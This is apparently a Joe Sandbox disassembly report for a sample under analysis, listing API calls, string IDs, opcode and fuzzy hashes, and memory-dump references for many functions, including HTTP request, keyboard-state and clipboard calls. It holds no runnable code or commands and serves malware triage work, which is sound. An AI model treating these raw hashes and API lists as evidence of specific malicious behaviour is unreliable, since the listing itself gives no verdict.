                                                                                                                                                                                                                                      • Opcode ID: 6c6fe0c54b4637bec90a8c09fd670b1c86d2cdf142e5880ed2b75b9cf71da061
                                                                                                                                                                                                                                      • Instruction ID: 391a61c1c5c01beeadae91a4bdb1c34f7d3ea16f96fc30b1e72d87385b6e80dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c6fe0c54b4637bec90a8c09fd670b1c86d2cdf142e5880ed2b75b9cf71da061
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D391DE75A04218AFDB009FA8D884BBEB7F9EF44324F10509BE954FB391E774A946CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED87FD
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED8811
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ED883B
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00ED8855
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED8867
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED88B0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00ED8900
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                                                                                                                                      • Opcode ID: bc1b72efa6d01d7ecff91339001ac52862f717698213f5bf966b620ef0fee9a3
                                                                                                                                                                                                                                      • Instruction ID: d1d9fbadb1a6c4a86f07ecbb5522c4c96c8f43239cf32cc48d2e77153cfc7591
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc1b72efa6d01d7ecff91339001ac52862f717698213f5bf966b620ef0fee9a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C81CF729042019FCB24EF14CA44AAAB3E8FF95354F64681FF899E7350DB34D946CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E662B7
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: GetClientRect.USER32(?,?), ref: 00E6636D
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: GetWindowRect.USER32(?,?), ref: 00E663AE
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: ScreenToClient.USER32(?,?), ref: 00E663D6
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 00EA5010
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EA5023
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EA5031
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EA5046
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00EA504E
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EA50DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                      • Opcode ID: 362aff48b5ee54aeade1c17e4fb2a563da433fde6b4fbecd22a52f859b3dc480
                                                                                                                                                                                                                                      • Instruction ID: c9aa5f9548c77424a92c6419fb69ba40c49c21154ee08a0c388acf7ad0a5848a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 362aff48b5ee54aeade1c17e4fb2a563da433fde6b4fbecd22a52f859b3dc480
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4271CF32500609DFCF218F64CC84AFA3BB5FF8A368F146669ED557E1A6D731A840DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00ED3E34
                                                                                                                                                                                                                                      • LoadStringW.USER32(00F33390,?,00000FFF,?), ref: 00ED3E5A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 2948472770-2391861430
                                                                                                                                                                                                                                      • Opcode ID: 11301a9e873830a2700d1159c25eef5100337d8630182ffc3e3db0c1c7ae80e6
                                                                                                                                                                                                                                      • Instruction ID: 84a51f4f3de0b4f534287f22279e0bb88b73ec1934a1273e884dca3ae659b1f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11301a9e873830a2700d1159c25eef5100337d8630182ffc3e3db0c1c7ae80e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1651B132D4021DAACF14EBE0EC42EEEBBB8EF14354F042125F515721A2DB316A9ADF51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetCursorPos.USER32(?), ref: 00E6136E
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: ScreenToClient.USER32(00000000,?), ref: 00E6138B
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetAsyncKeyState.USER32(00000001), ref: 00E613C2
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetAsyncKeyState.USER32(00000002), ref: 00E613DC
                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00EF938C
                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00EF9392
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00EF9398
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00EF9433
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EF9446
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00EF9520
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                      • Opcode ID: 8e8632331386c510e2264ca5c60ee54428a1cc40e3cc19ce3295b10c80e3e61e
                                                                                                                                                                                                                                      • Instruction ID: fb8d6dfd2e73ee4c4afd3edf863fb2fc86315bca25baee29f1dc24e738a472bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e8632331386c510e2264ca5c60ee54428a1cc40e3cc19ce3295b10c80e3e61e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3519D71104308AFD704EF10DC55F6A7BE5FB84714F00191DFA96672E2DB71A908DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EDCAC2
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EDCAEA
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EDCB1A
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EDCB72
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00EDCB86
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00EDCB91
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                      • Opcode ID: abc087365d8a47682e2c54b5b10f6e81c3ec3dd86d4d2c486345a2deebca5f76
                                                                                                                                                                                                                                      • Instruction ID: 028318529eef4de82be7a02eb9d6ddd53c672ec8f0b6fb471366223a3fe37142
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abc087365d8a47682e2c54b5b10f6e81c3ec3dd86d4d2c486345a2deebca5f76
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8319CB1504605AFD721AF65CC89ABB7BFCEB44784B20581BF446A7350DB30ED0ADBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EA4402,?,?,Bad directive syntax error,00EFDCD0,00000000,00000010,?,?), ref: 00EC9F22
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00EA4402,?), ref: 00EC9F29
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EC9FED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString
                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                      • API String ID: 2734547477-4153970271
                                                                                                                                                                                                                                      • Opcode ID: 9591e3b137906ba56283df7f4214ecc30f73b856d4550c3145fbabf9f2e3f80a
                                                                                                                                                                                                                                      • Instruction ID: 3117abab3d3a2c0a5e2b23b57358674a235dfb7bcb7bd8d5084436d1535b89df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9591e3b137906ba56283df7f4214ecc30f73b856d4550c3145fbabf9f2e3f80a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE218E3294421AEBCF11AB90DC0AEEE7BB9BF18308F045059B615760A2DA71A628DB11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC2735
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00EC274A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC27D7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                      • Opcode ID: e4ae37d1d72302b5630288e8db3d8d69f8c6d0f82e40dda9dbdda79ac07cedc0
                                                                                                                                                                                                                                      • Instruction ID: c43c71fb285b4a6b14e87fd08f6cfdcf80c4668c3f2747e6cdc173ed921e5cdb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4ae37d1d72302b5630288e8db3d8d69f8c6d0f82e40dda9dbdda79ac07cedc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 891106B6288307BAFA003325AD86EE677DCDF51324F20101FFA08F44D1FA63A8525621
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E6636D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E663AE
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00E663D6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E6651A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E6653B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                      • Opcode ID: e6e2d5b53bc6d2fa53626a076de14796dce4de21a407c7c089030a4f32a0dbd4
                                                                                                                                                                                                                                      • Instruction ID: dea0741c99d2a86f938583cdc07d1d161eef56cfadb124132f9627b9b9b332b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6e2d5b53bc6d2fa53626a076de14796dce4de21a407c7c089030a4f32a0dbd4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C1583591065AEFDB10CFA8D880BEDBBB1FF58314F14A41AE8A5F7250DB34A950DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EF59ED
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00EF5A2E
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00EF5A34
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EF5A38
                                                                                                                                                                                                                                        • Part of subcall function 00EF77BA: DeleteObject.GDI32(00000000), ref: 00EF77E6
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF5A74
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF5A81
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF5AB4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EF5AEE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EF5AFD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3210457359-0
                                                                                                                                                                                                                                      • Opcode ID: 1ac305bd3b6d2bdd467e683e21481f73eec0ca0c91639b9b850bfad1a61aa29a
                                                                                                                                                                                                                                      • Instruction ID: 636eb17213cf0bc5543f0237bd97a6948956f6f494e83cbad4085689f763b78b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ac305bd3b6d2bdd467e683e21481f73eec0ca0c91639b9b850bfad1a61aa29a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00518F32644A0DFFEF259F24CC49BF83BA1AB54364F14A116B724B61E1C7B19990EF41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00EB6F22
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00EB6F3B
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EB6F4B
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00EB6F63
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EB6F84
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E78DDE,00000000,00000000,00000000,000000FF,00000000), ref: 00EB6F93
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EB6FB0
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E78DDE,00000000,00000000,00000000,000000FF,00000000), ref: 00EB6FBF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                                                      • Opcode ID: f04a4aefba8eb5234b51dcbc4f13e3136a58f3f690f2cfbc04b3188685f98d0b
                                                                                                                                                                                                                                      • Instruction ID: 327a4b345ea1c71c8e7ee5ad111ca0e86dafafa1ee5fab2532b821389a1c8ab1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f04a4aefba8eb5234b51dcbc4f13e3136a58f3f690f2cfbc04b3188685f98d0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24518870640209EFDB20DF25DC49FBA7BB6EF98314F109519F94AA72A0DB70E950EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                      • Opcode ID: a801ab75dabecb5a4ed20b8e9901e2e079bf6cca0a7a23205ba700e9941b7244
                                                                                                                                                                                                                                      • Instruction ID: 38430c4048166aa876402933eefffcdf439b283dd95c77835729fb8236d8187a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a801ab75dabecb5a4ed20b8e9901e2e079bf6cca0a7a23205ba700e9941b7244
